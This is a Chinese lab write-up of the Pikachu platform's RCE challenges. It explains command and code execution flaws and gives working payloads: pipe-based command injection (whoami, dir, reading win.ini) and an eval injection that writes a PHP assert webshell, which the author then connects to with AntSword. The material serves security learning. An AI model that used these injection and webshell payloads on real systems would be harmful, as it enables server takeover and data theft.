本文深入探讨了RCE(远程命令/代码执行)漏洞,包括其原理、常见场景及危害。通过实例展示了如何利用管道符进行命令注入,揭示了未过滤用户输入导致的安全风险。并分享了两关实战挑战的解题过程,涉及命令连接符的使用和eval函数的滥用,提醒开发者注意输入验证的重要性。
目录
一、官方介绍
本节引用内容来源pikachu漏洞平台
RCE(remote command/code execute)概述
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
远程系统命令执行
一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口
比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上
一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器
现在很多的甲方企业都开始实施自动化运维,大量的系统操作会通过"自动化运维平台"进行操作。 在这种平台上往往会出现远程系统命令执行的漏洞,不信的话现在就可以找你们运维部的系统测试一下,会有意想不到的"收获"-_-
远程代码执行
同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。 不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。
你可以通过“RCE”对应的测试栏目,来进一步的了解该漏洞。
二、诚意推荐
https://chybeta.github.io/2017/08/08/php代码-命令执行漏洞/ 这是别人的一篇文章,对代码执行和命令执行漏洞相关的函数总结的挺好的
远程命令执行/命令注入 之 命令连接符 (https://blog.youkuaiyun.com/elephantxiang/article/details/115361185) 这一篇是我之前总结的windows和linux系统下的命令连接符的种类、特征以及实际操作。
DVWA通关--命令注入(command injection)(https://blog.youkuaiyun.com/elephantxiang/article/details/110940221) 这篇是我之前写的DVWA靶场的命令注入通关
三、悠闲通关
这两关都比较简单直白,理论性的内容就不多描述了,看上一节诚意推荐的链接就行。
第1关 exec "ping"
看关卡名字就知道是远程命令执行了
果不其然进来就是个ping ip地址的地方
由于windows和linux有3个命令连接符是相同的(|,||,&&),因此在不知道目标的具体操作系统的情况下(虽然是我自己搭建的环境,但是,假装不知道吧,嘻嘻),我比较喜欢先用这三种。
这次先用管道符(|)试试吧。
命令就用whoami,原因在远程命令执行/命令注入 之 命令连接符也有说。
输入payload:127.0.0.1|whoami
成功得到域和用户名:e0c8k97s36f0uri\administrator
同时也知道了操作系统是windows
输入payload:127.0.0.1|dir
可以查看当前路径和路径下的文件
输入payload:127.0.0.1|type C:\Windows\win.ini
可以查看win.ini文件的内容
P.S.这关后来试了windows下的4中命令连接符都是可以成功的,注意||和&&的短路现象。
造成这个漏洞的原因可以看一下本关的源代码,如下图,关注一下用户输入的参数值$_POST['ipaddress']的流向。
本关代码中,首先将$_POST['ipaddress']赋值给$ip,然后直接未经任何处理就将其传入shell_exec()函数执行,造成命令可拼接执行。
第2关 exec "eval"
题目都提示的这么明显了,直接上payload吧。
输入:phpinfo();
phpinfo()函数被执行了
我膨胀了,我想要个马。
输入payload:fputs(fopen('shell.php','w'),'<?php assert($_POST[fin]);?>');
虽然返回了这么个玩意儿,但是魔法已经悄然发生
到靶机上看一看,哦吼,本关目录下多了个马
拿蚁剑这么一连
成了
漏洞原因就是用户输入没过滤就直接传到eval()函数里面去了
愉快结束,洗洗睡了~
扫一扫
1102
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
